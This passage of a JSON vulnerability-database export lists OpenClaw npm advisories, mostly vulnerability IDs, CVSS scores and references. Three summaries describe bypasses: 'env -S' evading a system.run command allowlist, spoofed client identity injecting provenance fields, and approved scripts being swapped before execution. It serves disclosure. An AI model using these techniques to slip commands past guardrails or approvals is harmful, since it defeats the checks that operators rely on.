D-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability
":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability
":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability
":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability
":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-vmhq-cqm9-6p7q"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-21eb-723m-xkfu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91663?format=json","vulnerability_id":"VCID-24eb-5jt8-aueq","summary":"Duplicate Advisory: allowlist exec-guard bypass via env -S\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-48wf-g7cp-gr3m. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.23 contain an allowlist bypass vulnerability in system.run guardrails that allows authenticated operators to execute unintended commands. When /usr/bin/env is allowlisted, attackers can use env -S to bypass policy analysis and execute shell wrapper payloads at 
runtime.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/3f923e831364d83d0f23499ee49961de334cf58b","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/3f923e831364d83d0f23499ee49961de334cf58b"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a1c4bf07c6baad3ef87a0e710fe9aef127b1f606","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/a1c4bf07c6baad3ef87a0e710fe9aef127b1f606"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-allowlist-exec-guard-bypass-via-env-s","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-allowlist-e
xec-guard-bypass-via-env-s"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31992","reference_id":"CVE-2026-31992","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31992"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-48wf-g7cp-gr3m","reference_id":"GHSA-48wf-g7cp-gr3m","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-48wf-g7cp-gr3m"},{"reference_url":"https://github.com/advisories/GHSA-x742-88jj-7hv9","reference_id":"GHSA-x742-88jj-7hv9","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x742-88jj-7hv9"}],"fixed_packages":[],"aliases":["GHSA-x742-88jj-7hv9"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-24eb-5jt8-aueq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91104?format=json","vulnerability_id":"VCID-24m7-jx1g-hqde","summary":"OpenClaw: Gateway chat.send ACP-only provenance guard could be bypassed by client 
identity spoofing\n## Summary\n\nACP-only provenance fields in `chat.send` were gated by self-declared client metadata from the WebSocket handshake rather than verified authorization state.\n\n## Impact\n\nA normal authenticated operator client could spoof ACP identity labels and inject reserved provenance fields intended only for the ACP bridge.\n\n## Affected Component\n\n`src/gateway/server-methods/chat.ts, src/gateway/server/ws-connection/message-handler.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `4b9542716c` (`Gateway: require verified scope for chat provenance`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41299","reference_id":"","reference_type":"","scores":[{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20486","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20434","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20474","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41299"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4b9542716c26ac77652bcaa0f562043b298b409f","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/4b9542716c26ac77652bcaa0f562043b298b409f"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6xg4-82hv-cp6f","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L
/UI:N/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:38:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6xg4-82hv-cp6f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41299","reference_id":"CVE-2026-41299","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41299"},{"reference_url":"https://github.com/advisories/GHSA-6xg4-82hv-cp6f","reference_id":"GHSA-6xg4-82hv-cp6f","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6xg4-82hv-cp6f"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-client-identity-spoofing-in-chat-send-gateway-provenance-guard","reference_id":"openclaw-client-identity-spoofing-in-chat-send-gateway-provenance-guard","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:38:14Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-client-identity-spoofing-in-chat-send-gateway-provenance-guard"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VC
ID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VC
ID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VC
ID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41299","GHSA-6xg4-82hv-cp6f"],
"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-24m7-jx1g-hqde"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89353?format=json","vulnerability_id":"VCID-258k-a4dw-tfae","summary":"OpenClaw: pnpm dlx approvals did not bind local script operands\n## Summary\n\nBefore OpenClaw 2026.4.2, `pnpm dlx` approval planning did not bind local script operands the same way as related `pnpm exec` flows. A local script approved through a `pnpm dlx` path could be replaced before execution without invalidating the approval.\n\n## Impact\n\nAn operator could approve a benign local script and then execute modified script contents through the still-valid approval plan. This was an approval-integrity bug in the node-host command-planning path.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `176c059b05357df1bc09d4328a2380670859eeff` — bind local scripts in `pnpm dlx` approval plans\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. 
Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @Kazamayc for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/176c059b05357df1bc09d4328a2380670859eeff","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/opencl